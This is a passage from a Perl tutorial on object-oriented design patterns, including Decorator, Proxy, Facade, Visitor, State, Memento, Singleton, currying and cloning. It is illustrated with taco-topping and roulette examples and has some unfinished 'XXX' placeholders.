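print $basket->query_price(), " ", $basket->query_weight(), "\n";  # 10.98 1.3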
"TypeSafety" in TypeSafety breaks down when presented with generic, reusable containers that can hold any type of data. If a container only holds one specific type of data, we know any items retreived from it are of the correct type, and no type errors can occur, but then we can't reuse that container. follows C++'s ideas of templates, and provides a generic implementation that can create instances tailored to specific data types to enforce safety. purists will find this of interest. and "StateVsClass" in StateVsClass talk about other, more present, type issues that crop up when creating containers full of subclasses of a certain type. What if one subclass doesn't do something the superclass does? Model it as state. Null-methods are okey. Don't fork the inheritance to remove a feature. Similar to "IntroduceNullObject" in IntroduceNullObject, but for methods. Hmm.?, section 5.19, has an example of a basket that cores fruit. How could this possibly made general? Anything other than a fruit would need a -core()> method that does nothing, requiring a base class implementing a stub core() to be inherited by all. Extract a generic interface: Containers should maintain relationships between objects they contain when the relationships are too numerous or abstract. An object that is part of a series might have links to the next and previous objects in that sequence: package LinkedList::Link; sub new { bless { prev => undef, next => undef }, $_[0]; } sub next { $_[0]->{next} } sub set_next { $_[0]->{next} = $_[1] } sub prev { $_[0]->{prev} } sub set_prev { $_[0]->{prev} = $_[1] } See for an explanation of this style of code, if you must. The objects place in the sequence makes sense to be part of the object. Each object can point you at the next one, following the "LawOfDemeter" in LawOfDemeter. Should the object be part of two linked lists, or three linked lists, or an arbitrary number of linked lists, no fixed method can be called to deturmine the "next" object in the sequence, because no assumption can be made about which sequence you're talking about. An access would have to exist for previous and next for each sequence the object is part of. It makes more sense to seperate the linking from the object. Rather than adding the code to do whatever to LinkedList::Link, LinkedList::Link should delegate to it: see. The object would be bare of any linked list logic, though several LinkedList::Link objects may hold a reference to it, and it might be part of an arbitrary number of linked lists, or other data structures. See "ObjectsAndRelationalDatabaseSystems" in ObjectsAndRelationalDatabaseSystems for more on the problems of complex inter-object relationships. See Also Synopsis: Attach additional logic to an existing object. When: Something about an object needs to change. Objects can have attributes that change something about them. Decorators provide a flexible alternative to subclassing for extending functionality. used stacking burger toppings as an example. It's a good example. Lets use taco toppings instead, so we aren't copying them too blatantly. Lets imagine that there is a taco concession in a mall. We won't call it a Mexican restaurant. That would be a stretch. Most of their tacos sit under a heat lamp, pre-made, waiting for someone to order the standard taco. A rash of bowel disrupting bacteria outbreaks brought suspicion on the heat lamps, so people began ordering tacos with and without all kinds of weird toppings in attempt to foil the pre-making efforts and get a fresh taco. 
The concession stand management found that the cashiers were making a lot of errors adding up the costs of the toppings, so they complained to the corporate office. Corporate office searches the web for "a programmer that doesn't interview like they are reading from a script and who doesn't design patterns using taco toppings like the last guy", and hires the first person that comes up: a Perl programmer! [8]. This programmer could write something using dynamic inheritance - each topping class pushing the taco, or the previous topping, onto its @ISA. There are two gotchas here, though. What if we want a taco with extra, extra tomatoes? Topping::Tomato would be told to inherit itself. This would create an endless loop! All tomatoes would have tomatoes as their parent, not just the last one added. The base taco would be forgotten about. The real problem here is that we're modifying the whole class - not just the particular instance of the tomato we added last. This would keep us from using a multithreaded cash register shared by two people, and it would keep us from having two taco orders on the same tab, each with different toppings. Dynamic inheritance is a cool trick, but you must remember that its effects are global. Reserve it for creating objects of a new, unique name, of user specification, and perhaps a few similar applications. See "AbstractFactory" in AbstractFactory for more on custom-crafted objects. For some reason, this mess reminds me of "SelfJoiningData" in SelfJoiningData.

For our purposes, though, this won't fly. The linked-list approach is the right approach. We need to instantiate individual toppings as objects, so that they each have private data. In this private data, we need to store the relationship: what the topping is topping is an attribute of each topping. See "InstanceVariables" in InstanceVariables for more on keeping data private to an instance of an object. The query_price() method of the taco object just passes the request right along, and any math we want can be done along the way. A two-for-taco-toppings Tuesday, where all toppings were half price on Tuesdays, would show off the strengths of the "DecoratorPattern" in DecoratorPattern. With a press of a button, a new object could be pushed onto the front of the list that defined a price method that just returns half of whatever the query_price() in the next object returns. The important thing to note is that we can stack logic by inserting one object in front of another when using "has-a" relationships. For yet another approach, see the "AggregatePattern" in AggregatePattern. For the sake of simplicity and clarity, each of these approaches has a different API. There is no reason they couldn't have been done consistently.

Problem: Objects talk to each other using an interface that has been overburdened with the needs of security, access coherence, or historic versions of the interface.

Solution: Move the access-centric features of the interface into a Proxy object. Put it in charge of security, or implement the translation between the historic interface there, or use it to enforce access coherency.

The Proxy Object is the granddaddy of all encapsulation patterns, due to its sheer lack of scope. Any other delegation pattern is just a special case of this general case. The Problem/Solution lines list some possible uses, but they could just as well be phrased "one object demands too much of another - have the second handle some of the work and delegate the rest".
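A minimal sketch of that phrasing - a generic proxy that does a bit of work itself (a toy access check) and delegates the rest. All of the names here are invented for the sketch:

  # A generic delegating proxy: it performs an access check (the work
  # it handles itself), then delegates everything else to the wrapped
  # object via AUTOLOAD.
  package Proxy;

  our $AUTOLOAD;

  sub new {
      my ($class, $object) = @_;
      bless { object => $object }, $class;
  }

  sub AUTOLOAD {
      my $self = shift;
      (my $method) = $AUTOLOAD =~ m/::(\w+)$/;
      return if $method eq 'DESTROY';
      die "access denied to $method\n" if $method =~ m/^_/;  # sample policy
      return $self->{object}->$method(@_);                   # delegate the rest
  }

  # So the proxy passes type checks meant for the real object:
  sub isa { my $self = shift; $self->{object}->isa(@_) }

  package Counter;   # a trivial object worth proxying

  sub new       { bless { n => 0 }, shift }
  sub increment { $_[0]{n}++ }
  sub value     { $_[0]{n} }

  package main;

  my $proxy = Proxy->new(Counter->new);
  $proxy->increment;
  print $proxy->value, "\n";   # 1, via delegation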
A Proxy inherits the same base class or interface as the object it contains. It can be a generic proxy that wraps arbitrary objects, or it can be custom-crafted to stand in for a certain class. Other ideas, such as the "FacadePattern" in FacadePattern, are based on this. This pattern supports the idea of encapsulation. Its requirements touch on "AccumulateAndFire" in AccumulateAndFire.

Problem: Code will work with one kind of object, but there is another kind of object that should be able to be used in its place - that should work, but doesn't. Two interfaces are incompatible implementations of the same idea. Using vendor products interchangeably. Or, an object that requires one kind of object, when it should accept several different kinds.

Solution: Translate one interface to the other using a dedicated Adapter object.

The Adapter is a case of the "ProxyPattern" in ProxyPattern. It isn't even a special case. You could call it an example of a Proxy. Or vice versa. One object requires a certain type of object. You have another object that provides an interface. You want to use them together. You could subclass one of the objects, but you'd lose polymorphism, unless all subclasses and compatible objects were subclassed individually as well - which reeks of parallel inheritance hierarchies. Yuck. Instead, make a generic container that is accepted by any of the first class, and contains anything derived from the second class, which translates between the two disparate interfaces.

XXX desperately needs a diagram here. I can't think of an example that doesn't insult the intelligence. I'll have to look for one in the wild. XXX Discussion. XXX Code - the version from the Design Patterns talk.

"InnerClasses" in InnerClasses are often used as Adapters. In Java, there is no way to pass a closure, a subroutine pointer, or any other first-class object other than an actual object. Java 1.0 required you to create a named class for each and every callback you needed. [9] This was clearly unworkable. Java 1.1 eased the matter by allowing these objects to be defined with a shorthand syntax, and allowed the definition to be placed in your code right where they are passed. See "InnerClasses" in InnerClasses for more information.

Problem: A class is unwieldy to use. You don't want to be tied to that interface or implementation. Your code is becoming closely tied to a class that you don't like, or you spend a lot of time dealing with a difficult interface, or several programmers on your team have to learn a complex subject to accomplish a few simple tasks.

Solution: Write a new interface to it that translates between your simple requests and perhaps automates tedious things you do frequently.

Normally, you write for the interface of the class that you're using today, and if you have to use a different class tomorrow, you write a Proxy. With a poor or overly complex interface, you may wind up writing for a complex interface, then writing a Proxy to translate that back to a simple interface. A Facade is a neutral ground. It gives you somewhere to shove all of the related undesired complexity, should you switch classes. You can replace it with a new Facade that translates the simple interface of the first facade to the simple interface of the replacement class. A "DecoratorPattern" in DecoratorPattern adds complexity to the class it stands in for; a "FacadePattern" in FacadePattern mitigates complexity. Both are cases of the "ProxyPattern" in ProxyPattern.
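To make this concrete, here is a minimal sketch of a Facade. The fussy Mailer::Fussy interface standing in for the real offender is invented for the example:

  # A hypothetical fussy interface we are stuck with:
  package Mailer::Fussy;

  sub new        { bless {}, shift }
  sub set_host   { $_[0]{host} = $_[1] }
  sub set_from   { $_[0]{from} = $_[1] }
  sub set_to     { $_[0]{to}   = $_[1] }
  sub set_body   { $_[0]{body} = $_[1] }
  sub connect    { print "connecting to $_[0]{host}\n" }
  sub transmit   { print "sending to $_[0]{to}\n" }
  sub disconnect { print "done\n" }

  # The Facade: one simple call hides the whole tedious ritual.
  package Mailer::Simple;

  sub new { bless {}, shift }

  sub send {
      my ($self, %args) = @_;
      my $mailer = Mailer::Fussy->new;
      $mailer->set_host($args{host} || 'localhost');
      $mailer->set_from($args{from});
      $mailer->set_to($args{to});
      $mailer->set_body($args{body});
      $mailer->connect;
      $mailer->transmit;
      $mailer->disconnect;
      return 1;
  }

  package main;

  Mailer::Simple->new->send(
      to => 'someone@example.com', from => 'me@example.com', body => 'hi',
  );

Should the fussy class be replaced tomorrow, only Mailer::Simple needs rewriting; the rest of the program stays blissfully ignorant.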
Conceivably, you could replace one package with a horrible interface with another package with an equally horrible interface. In this case, you would need to stick in an equally complex Facade, but the code using the interface could remain blissfully ignorant of the whole ordeal.

- "The Facade Design Pattern" by brian d foy, The Perl Review, v0 i4

Problem: Polymorphic objects (interchangeable objects) pass sets of information to each other and return it back to each other. When passed in array form, it is difficult to add or remove arguments, and optional arguments require unsightly placeholders.

Solution: Rather than maintain the method calls and returns in all of the calling and callee objects, put the results in a new, intermediate object type.

When you rename, insert, or delete a passed or returned parameter, you have to change dozens of objects. Using an intermediate object to hold the results lets you add fields without breaking code anywhere. Deleting or changing a member of the result only affects places actually using that property, and opens the possibility of backwards compatibility catering to accesses to the old field. Contrast this with the horror of positional arguments in a method call:

  $foo->do($arg, $str, $bleah, $blurgh);

Should the arguments do() accepts be changed, every place it is called would need to be changed as well to be consistent. Failure to do so results in no warning and erratic bugs. "TypeSafety" in TypeSafety helps, but there is still no compile-time check - a missed call site can lead to a program-killing bug.

Problem: The operations that can be performed on a type of object are poorly defined, and always changing. Objects contain large numbers of unrelated methods that perform some sort of logic.

Solution: Instead of continuously revising the objects themselves, put the logic into interchangeable (polymorphic) Visitor objects. Use a fixed interface between the objects containing data and the objects defining the behavior.

Data is contained in objects of a certain class or subclass. Many operations can be performed on objects of this class. The actual operation to be done becomes pluggable. This fits with putting code where it belongs.

Infocom, famous for its text adventure games with extremely intelligent natural-language parsers, used a permutation of this idea. Any action you wished to perform was stated as a sentence. The parser picked out the verb, direct object, and indirect object. In three rounds, the verb was invoked, then the direct object, then the indirect object. In the first round, each object was given a chance to veto the action: perhaps the verb object checked to see if the environment was tagged as being underwater, or the direct object may know for a fact that the material it is made out of is non-flammable, or the indirect object may be a torch that isn't currently lit, and vetoes the action because it knows it isn't lit. If not vetoed, this is repeated for a round where changes actually take effect and objects update their state, then for a final round where each object reports on the consequences of the action. In this case, a container object holding information about the sentence is acted upon by three pluggable objects: the verb's Visitor, the direct object's Visitor, and the indirect object's Visitor. Another example would be a porridge container acted upon by three different bear Visitor objects. We use different objects' logic to work on our data.
As Perl gives us dynamic inheritance, adding and removing objects from our @ISA array could have the same effect. We simply inherit from the object that accesses our data the way we want, when we want. When methods defined in the Visitor object are called, they are presented with all of our data, saving the bother of querying each item individually. This still requires a clean, well-defined interface: which methods need to be defined, and how the data is represented. As a disadvantage, this approach rules out making changes to how we store the data while maintaining compatibility through the interface.

The Visitor name emphasizes that the objects implementing behavior and the object containing data have no real relationship with each other: neither holds on to a reference to the other. They are merely interchangeable parts, here today and gone tomorrow.

Borrowing from an example elsewhere, data items are coerced into a common superclass. This isn't object clean. It is always better to fix problems at the source rather than lurk in wait wielding band-aids [12]. The example does serve to illustrate that data items should be of a common base type to be acceptable to a Visitor.

  foreach my $class ( qw(NAME SYNOPSIS CODE) ) {
      no strict 'refs';
      push @{ "POD::${class}::ISA" }, "POD::POD";
  }

Not having to use a different method call in each behavior object is key. That would prevent us from using them interchangeably. It would introduce the need for hardcoded dependencies. We would no longer be able to easily add new behavior objects. Assuming that each behavior object has exactly one method, each method should have the same name. Something generic like go() is okay, I suppose. Naming it after the data type it operates on makes more sense, though. If there is a common theme to the behavior objects, abstract it out into the name. top_taco() is a fine name.

  package Taco::Topper;

  sub top_taco {
      my $self = shift;
      die "we're an abstract class, moron. use one of our subclasses" if ref $self eq __PACKAGE__;
      die "method strangely not implemented in subclass";
  }

  sub new {
      my $class = shift;
      bless [], $class;
  }

  package Taco::Topper::Beef;

  use base 'Taco::Topper';

  sub top_taco {
      my $self = shift;
      my $taco = shift;
      if($taco->query_flags()) {
          die "idiot! the beef goes on first! this taco is ruined!";
      }
      $taco->set_flags(0xdeadbeef);
      $taco->set_cost($taco->query_cost() + 0.95);
  }

  package Taco::Topper::Cheese;

  use base 'Taco::Topper';

  sub top_taco {
      my $self = shift;
      my $taco = shift;
      if(! $taco->query_flag(0xdeadbeef) and ! $taco->query_flag(0xdeadb14d)) {
          # user is a vegetarian. give them a sympathy discount because we feel
          # bad for them for some strange reason, even though they'll outlive us by 10 years
          $taco->set_cost($taco->query_cost() - 1.70);
      }
      $taco->set_flags(0xc43323);
      $taco->set_cost($taco->query_cost() + 0.95);
  }

  package Taco::Topper::Gravy;

  # and so on...

Gravy? On a taco? Yuck! In real life, places in the mall that serve "tacos" also tend to serve fries, burgers, hotdogs, and other dubiously non-quasi-Mexican food. It doesn't make sense to have one vat of cheese for the nachos, another for tacos, and yet another for cheesy-gravy-fries. The topper should be able to apply cheese to any of them. Keep in mind that these behavior classes work on a general class of objects, not merely one object. A burger could be a subclass of a taco. See "StateVsClass" in StateVsClass for some thoughts on what makes a good subclass. The taco object could then do something vaguely along the lines of...

  $topping_counter->get_cheese_gun()->top_taco($self);

...
where $topping_counter holds our different topping guns, and get_cheese_gun() returns a cached instance of Taco::Topper::Cheese. This creates a sort of cow-milking-itself problem. The taco shouldn't be cheesing itself; some other third party should make the connection. Assuming that the topping counter has been robotized and humans enslaved by the taco-craving robots, perhaps the topping counter could cheese the taco. [13]

Taco::Topper's strange die() calls give a prime example of run-time interface checking versus compile-time interface checking. Perl does this at run time, Java at compile time. Since the Java compiler would catch either of those errors, no run-time checks are needed - those die() calls could go away. Also, the program wouldn't need to be thoroughly tested to find out if those die() calls ever happen - once again, it would be caught at compile time.

The "VisitorPattern" in VisitorPattern is a special case of "FeatureEnvy" in FeatureEnvy: we're more concerned about another object's data than our own. This flies in the face of the first rule of programming: data and related code should be packaged together. "FeatureEnvy" in FeatureEnvy suggests that perhaps the code should just be moved into the object being tweaked. In this case, we've been there, didn't like it, and moved it out, but abstracted it behind an interface. The alternative would have been something far worse. The first rule of programming is that anything is okay if it's hidden behind an interface. The important thing to remember is that we can cheese things as long as they provide an interface that allows cheesing. In this example: query_flag(), set_flags(), query_cost(), and set_cost().

Problem: Values from a definitive list of permissible values are needed. In Perl, hashes of possible valid values are commonly used, and enums are used in C. These permissible values must be packaged with their behavior [14], or we're trying to apply this idea in an un-object-oriented way. Or, each object is special: unique, impossible to recreate without being given it, and therefore later usable as proof of having been given the cookie.

Solution: Centralize creation, containment, and distribution of the objects. The container of the objects also plays the roles of both creator and distributor. The creator aspect makes one of each when it itself is created, like the "SingletonPattern" in SingletonPattern applied to multiple objects. The distributor aspect decides to whom and on what basis the objects are distributed. The idea of "TypeSafety" in TypeSafety allows us to validate that these objects probably came from our pool without having to keep an explicit list of all of the members of the pool:

  # using TypeSafety:

  sub set_day {
      die unless $_[0]->isa('Day');
      $day = shift;
      return 1;
  }

  # using a plain old hash:

  sub set_day {
      die unless exists $daysref->{$_[0]};
      $day = shift;
      return 1;
  }

Everything from this set passes the "isa" test, so we can use "TypeSafety" in TypeSafety to check our arguments. In most any other language, it would be impossible to add to the set after it is created this way, but in Perl we could revisit the package (see "RevisitingNamespaces" in RevisitingNamespaces) or redefine the constructor, so this shouldn't be considered secure.
  package Day;

  use ImplicitThis;
  ImplicitThis::imply();

  my @days;

  $mon = new Day 'mon';
  $tues = new Day 'tues';

  sub new {
      die unless caller eq __PACKAGE__;
      my $me = { id => $_[1] };
      bless $me, $_[0];
      push @days, $me;
      return $me;
  }

  sub get_id { return $id }

  sub get_days { return @days }

  # in Appointment.pm:

  package Appointment;

  my $day;

  sub set_day {
      die unless $_[0]->isa('Day');
      $day = shift;
      return 1;
  }

XXX examples of use, what you can and cannot do, etc.

Java's API, AWT especially, has numerous examples of this. AWT.Color contains AWT.Color.RED, AWT.Color.BLUE, and so forth. This provides a symbolic name for objects, where each object is unique. There will never be two different BLUE objects floating around. This allows us to compare them for equality using their pointers:

  $mon eq $mon;  # true
  $mon eq $tues; # false

This behavior, too, is shared with the "SingletonPattern" in SingletonPattern. The same effect could be achieved using "OverloadOperators" in OverloadOperators; this approach is simpler and more clear. If we give someone AWT.Color.BLUE, and then they later give it back to us, we can use the eq test to decide with certainty whether or not we gave them BLUE, as there is no other way they could possibly obtain it [15].

Credits: Unknown! Dates back a long time, though... XXX

Problem: Checks litter the code. Nearly every method checks one specific instance variable to decide how to behave. The possible values of this variable are finite in number and well understood: on and off, or north, south, west, and east, for example.

Solution: Make each possible state of the object into a subclass. Leave the general case and the general logic in the parent object. Consider the state variable to be a constant in each subclass and optimize it away in your code.

What happens when a light switch is thrown depends on its current state: on or off. Its new state is the opposite. A light switch has to be capable of dealing with all of the complexities of being either on or off - which isn't a lot of complexity, really. However, some machines have dozens or hundreds of states. That one machine has to know how to be in each state.

In reality, few machines serve a large number of purposes. Attempts have been made to combine cell phones and PDAs, cell phones and MP3 players, PDAs and MP3 players, MP3 players and portable storage devices, PDAs and portable storage devices, audio recorders and MP3 players, audio recorders and PDAs, audio recorders and cell phones... in thousands of combinations... but there is not currently an example of all three of those things in one device. It is complex to have a pocket full of devices, but it is also complex to <s>license all of the patents needed to implement</s> design a device that serves every purpose. Design simplicity wins, for now. Likewise, when implementing a complex virtual object, sometimes it is best to represent it as a collection of simple objects, each of which knows exactly what its purpose is and cares nothing for the purposes of the other objects - not even able to agree on a common flash media format. When you wish to switch from one mode of the object to another, you simply replace it with the other object. No complex internal state change occurs, just one broad overall state change. States are each clearly defined and separate.
  package Pocket::Computer;

  sub record_audio {
      # implemented in some subclasses but not others
  }

  sub take_a_memo {
      # that we can do
  }

  sub make_a_call {
      die "don't know how, and the FCC would have a cow";
  }

  package Pocket::Phone;

  sub record_audio {
      # some do, some don't. most don't.
  }

  sub take_a_memo {
      die "i'm not a PDA";
  }

  sub make_a_call {
      # this we can do
  }

Some devices can do some things, others can do other things. Each device does not have to check to see whether it is the kind of device that can - it just knows, because that's what it is, and identity is a large part of object orientation. At a certain level of complexity, the concept of a state machine is introduced. Cars suffer from this complexity. You may go from parked to idling, or you may go from idling to accelerating, but not from parked to accelerating. Going from accelerating to parked is also known as an insurance claim. Each state knows the states that are directly, immediately attainable. More machinery is needed to plan out anything more complex.

XXX - the "TinyWiki" in TinyWiki parser as an example.

"ImmutableObject" in ImmutableObject coupled with "AbstractFactory" in AbstractFactory describes an alternative arrangement: when a state change is needed, the existing object is passed as an argument to the factory along with any information needed to decide what the next object will be. The "AbstractFactory" in AbstractFactory returns an "ImmutableObject" in ImmutableObject, initialized with the existing object's data, to replace the existing object. One object is swapped for another not through delegation and a facade, but through an "AbstractFactory" in AbstractFactory that spits out instances of "ImmutableObject" in ImmutableObject.

One book, page 258, has a very good example of creating a simple web BBS using CGI::Application. CGI::Application models a user's web experience as a state machine. Each screen is a state that takes you to other states. The state transitions are buttons and so forth on the screens.

Problem: Objects are left in an inconsistent state in a failure scenario.

Solution: Checkpoint the object and restore it in the event of failure.

Synopsis: You need an "undo" behavior. Delegate an object to be the keeper of another.

When: You are starting something you may not be able to finish. An operation might abort, leaving data in an inconsistent state.

Symptoms: Querying values from an object and conditionally restoring them.

XXX Generic example with a deep-copy algorithm. Easily implemented by wrapping one object inside of another and using Clone.

  package Memento;

  use Clone;   # CPAN module; Clone::clone() does the deep copy mentioned above

  sub new {
      my $type = shift;
      my %opts = @_;
      die __PACKAGE__ . " requires an object passed on its constructor: new Memento object=>\$obj"
          unless $opts{'object'};
      my $this = { object => $opts{'object'}, checkPoint => undef };
      bless $this, $type;
  }

  sub mementoCheckPoint {
      my $this = shift;
      $this->{'checkPoint'} = Clone::clone($this->{'object'});
  }

  sub mementoRestore {
      # copy the checkpointed state back into the live object
      # (assumes a hash-based object, so other holders keep their references)
      my $this = shift;
      %{ $this->{'object'} } = %{ $this->{'checkPoint'} };
  }

Problem: You're using a constructor to create an object, but the design considers it an error to create more than one instance of that class. Or, you have a single instance of an object now, but this is an implementation detail, subject to change. "PassingState" in PassingState says to create resources as early as needed and pass them to constructors, but you would be passing this one almost everywhere.

Solution: Have your constructor, new(), return the same single object every time it is called. Allow objects to call the constructor directly.
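A minimal sketch of such a constructor - the class name is hypothetical, and real singletons usually carry more state than this:

  # Every call to new() hands back the same instance.
  package Config::Singleton;

  my $instance;   # the one instance, private to this file

  sub new {
      my $class = shift;
      $instance ||= bless { created => time() }, $class;
      return $instance;
  }

  package main;

  my $first  = Config::Singleton->new;
  my $second = Config::Singleton->new;
  print "same object\n" if $first == $second;   # always true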
The Singleton will create the single instance of itself, and will be the repository for that single instance.

Synopsis: You've found a very good reason to have exactly one of a certain class. You rig the constructor to return the single existing instance instead of making a new one.

When: One writer lists example valid uses as logging, network interaction, and database connections.

Symptoms: Resource objects are created when the program starts and passed to the constructor of each object initially spawned. Each of those objects in turn passes this resource object to each of its children. Given an object, you want to be sure that it's the true, one and only instance, and not someone's cheap knock-off.

Singletons are a special case of the pool of objects described earlier.

Don't Use Singletons When...

This is overused. Don't make too many assumptions about when two of something could be handy. For example, the X Window System early on assumed that more than one display could be attached to a system. This pattern should be used to distribute globally available resources. It should not be used to contain context or state information - that would make it impossible to create distinct instances of objects which use the singleton. Since many programs have a proliferation of Singletons, it may be handy to place all of them in a global Static Object, which itself is a Singleton. A Singleton managing a set of one or more objects for which there is contention or sharing is a pool. When a Singleton is wanted to hold configuration information, instead use "PassingPattern" in PassingPattern: this allows different instances of objects to be given different runtime parameters. Failure to do so would violate the identity requirement of programming, and we wouldn't want that, would we?

brian d foy's article on Singleton in The Perl Review has a good description of the dilemma - very good.

This is based on "TypeSafety" in TypeSafety - or rather, on the concept of types it puts forward. We confound the subject with "AnonymousSubroutineObjects" in AnonymousSubroutineObjects. We use "TypeSafety" in TypeSafety, "ClassAsTypeCode" in ClassAsTypeCode and "NewObjectFromExisting" in NewObjectFromExisting. "RunAndReturnSuccessor" in RunAndReturnSuccessor is fundamental to the idea of currying, and we demonstrate it in the second example.

Currying is a universe of single-argument functions. This sounds absurd and useless, and would be, except for the tenets of functional programming. This pattern develops when state is accumulated incrementally: see "AccumulateAndFire" in AccumulateAndFire. "AccumulateAndFire" in AccumulateAndFire comes about when there are "TooManyArguments" in TooManyArguments to pass all at once. Attempting to pass them all at once loses us the flexibility of being able to set things up, run, change a few things, run, and so on. For example, let's say we're playing roulette. We can pick a color and perhaps a few numbers.
  package Roulette::Table;

  sub new {
      my $class = shift;
      my $this;

      # if new() is called on an existing object, we're providing additional
      # constructors, not creating a new object

      if(ref $class) {
          $this = $class;
      } else {
          $this = { };
          bless $this, $class;
      }

      # read any number of any supported type of arguments

      foreach my $arg (@_) {
          if($arg->isa('Roulette::Color')) {
              $this->{'color'} = $arg;
          } elsif($arg->isa('Roulette::Number')) {
              push @{$this->{numbers}}, $arg;
          } elsif($arg->isa('Money')) {
              if($this->{money}) {
                  $this->{money}->combine($arg);
              } else {
                  $this->{money} = $arg;
              }
          }
      }

      return $this;
  }

  sub set_color  { new(@_) }
  sub add_number { new(@_) }
  sub add_wager  { new(@_) }

The constructor, new(), accepts any number or sort of object of the kinds that it knows about, and scuttles them off to the correct slot in the object. Our set routines are merely aliases for new(). new() may be called multiple times, directly or indirectly, to spread our wager over more numbers, change which color we're betting on, or plunk down more cash. I don't play roulette - I've probably butchered the example. Feel free to correct it. Use the little edit link. People won't be doing everything for you your entire life, at least I hope.

We still have the problem of having an object exist in an indeterminate state. If we apply "AnonymousSubroutineObjects" in AnonymousSubroutineObjects, we get something much closer to the original idea of currying. Rather than storing state in an object as it is built up, store it in a closure that is object-aware:

  package Roulette::Table;

  use MessageMethod;

  sub new {
      my $class = shift;
      my $this = { };
      my $curry;

      bless $this, $class;

      $curry = MessageMethod sub {
          my $msg = shift;

          if($msg eq 'spin_wheel') {
              die "Inconsistent state: not all arguments have been specified";
          }

          if($msg eq 'set_color') {
              $this->{'color'} = shift;
          }

          if($msg eq 'add_number') {
              $this->{'numbers'} ||= [];
              push @{ $this->{'numbers'} }, shift;
          }

          if($msg eq 'add_money') {
              my $money = shift;
              if($this->{'money'}) {
                  $this->{'money'}->combine($money);
              } else {
                  $this->{'money'} = $money;
              }
          }

          if($msg eq 'is_ready') {
              return 0;
          }

          if($this->{'money'} and $this->{'color'} and $this->{'numbers'}) {
              return $this;
          } else {
              return $curry;
          }
      };

      return $curry;
  }

  sub spin_wheel {
      # logic here...
  }

  sub is_ready { return 1 }

This second example doesn't support repeated invocations of new() to further define an unfinished object. It could, but that would detract from the example. Add it back for backwards compatibility if you have any reason to. More radically, we don't accept any constructor arguments. We return an entirely new object that has the sole purpose of accepting data before letting us at the actual object. Representing two different states of an object with two different objects is the subject of an ongoing debate, as well as of "StateVsClass" in StateVsClass. Rather than using "TypeSafety" in TypeSafety to check the class membership of objects passed in, we could just as easily accept "NamedArguments" in NamedArguments. The choice is a matter of what feels right, and what is adequate without being overkill. In brief, returning a custom object, partially configured by some argument, ready to either do work or accept more configuration, is the act of currying. More correctly, constructing a function to accept single arguments and return another function, or converting an existing function to such, is currying.
  sub create_roulette_table {
      my $color;
      my $money;
      my $numbers;

      return sub {
          $color = shift;
          return sub {
              $money = shift;
              return sub {
                  push @$numbers, shift;
                  return sub {
                      # play logic here
                  };
              };
          };
      };
  }

  # to use, we might do something like:

  my $table = create_roulette_table()->('red')->('500')->(8);
  $table->(); # play
  $table->(); # play again

  # or we might do something like:

  my $table_no_money = create_roulette_table()->('red')->('500');
  my $table;

  $table = $table_no_money->(100);
  $table->(); # play
  $table->(); # play again -- oops, lost everything

  $table = $table_no_money->(50);
  $table->(); # play some more

This is stereotypical of currying as you'd see it in a language like Lisp. The arguments are essentially untyped, so we take them one at a time, in a specific order. Also like Lisp, the code quickly migrates across the screen, then ends abruptly with a large number of block closes (the curly brace in Perl, parentheses in Lisp). The Lisp version makes heavy use of "RunAndReturnSuccessor" in RunAndReturnSuccessor. If we wanted to adapt this logic to spew out independent generated methods, where each method generated wasn't tied to the other generated methods, we would need to explicitly copy the accumulated lexical variables rather than simply binding to them. For example,

  my $color = $color;
  my $money = shift;

would prevent each anonymous routine returned from sharing the same $color variable, although without further logic, they would all have the same value. This amounts to the distinction between instance and class data. Understanding the Lisp-ish example isn't critical to using this idea. It merely serves to give us some context for the idea, and a counter-example to the approach. It also clearly demonstrates the advantages of having partially constructed objects lying around: we don't need to construct a whole new table just to put some more money down, but we have the power of creating objects to represent state at the same time.

"PerlMonks" in PerlMonks:62737 - taking references to methods (closures) - closely related to "CurryingConcept" in CurryingConcept.

Problem: A copy of an object is needed so it can be diddled while preserving the original, or an existing object should serve as a template for a new object.

Solution: Instead of probing into its innards from outside, implement it, or re-implement it, to have a clone() method. clone() makes an exact duplicate of the object from the inside.

When: You want to keep an unmodified copy of an object around, or you want to play with a copy of an object without hurting the original.

Symptoms: You're querying all of the fields out of one object, and passing them to the accessor methods of another object of the same type. Or, you access the underlying data structure directly, looping over the fields in one object, assigning the values to another. You spend a lot of effort to set up objects which are similar to each other.

Cloning must be designed into an object, or added in a subclass. Usually. Subclasses of a class with a clone() interface that add features to the class need to override the ancestor's clone() method and augment it to handle the new features. Since only the designer of a class will know for sure how to correctly clone it, it must be implemented with each package that features it. Cloning lets you distribute or play with copies of objects. It also lets you more easily make a series of similar objects, using one object as a template for others.
For objects based on hashes, an extremely simple implementation of this might look like:

  package Mumble;

  sub new { ... } # standard constructor

  sub clone {
      my $self = shift;
      my $copy = { %$self };
      bless $copy, ref $self;
  }

Note that this is a shallow copy, not a deep copy: clone() will return an object that holds additional references to the things that the object being copied holds onto. If it were a deep copy, the new copy would have its own private copies of those things. This is only an issue when the object being copied refers to other objects, perhaps delegating to them. A deep copy is a recursive copy. It requires that each and every object in the network implement clone(), though we could always fall back on reference sharing and fake it.

  my $copy = { %$self };

%$self expands the hash reference, $self, into a hash. This is done in list context, so all of the key-value pairs are returned out - by value, creating a new list. This happens inside of the { } construct, which creates a new anonymous hash, which is assigned to $copy. $copy is then a reference to a new hash holding the same data as $self. The end result is a duplicate of everything inside of $self. This is the same thing as:

  sub clone {
      my $self = shift;
      my $copy;
      foreach my $key (keys %$self) {
          $copy->{$key} = $self->{$key};
      }
      bless $copy, ref $self;
  }

If we wanted to do a deep copy, we could modify this slightly:

  sub clone {
      my $self = shift;
      my $copy;
      foreach my $key (keys %$self) {
          if(ref $self->{$key}) {
              $copy->{$key} = $self->{$key}->clone();
          } else {
              $copy->{$key} = $self->{$key};
          }
      }
      bless $copy, ref $self;
  }

This assumes that $self contains no hashrefs, arrayrefs, and so on - only scalar values and other objects. That is hardly a reasonable assumption, but the example illustrates the need for, and implementation of, recursion when cloning nested object structures.

"MomentoPattern" in MomentoPattern has an example of copying an object's data against its permission - something that shouldn't be made a habit.

Clone Factories keep a pool of archetypical objects, and return slightly modified copies on request. XXX - example.

Permutations exist where other objects serve as general-purpose object cloners or copiers. Due to Perl's introspective nature, a great deal of detail can be replicated. However, this will not always be safe, as some packages have special arrangements with their contents, some objects cannot handle multiple references existing to them, and so forth. This violates the encapsulation principle.

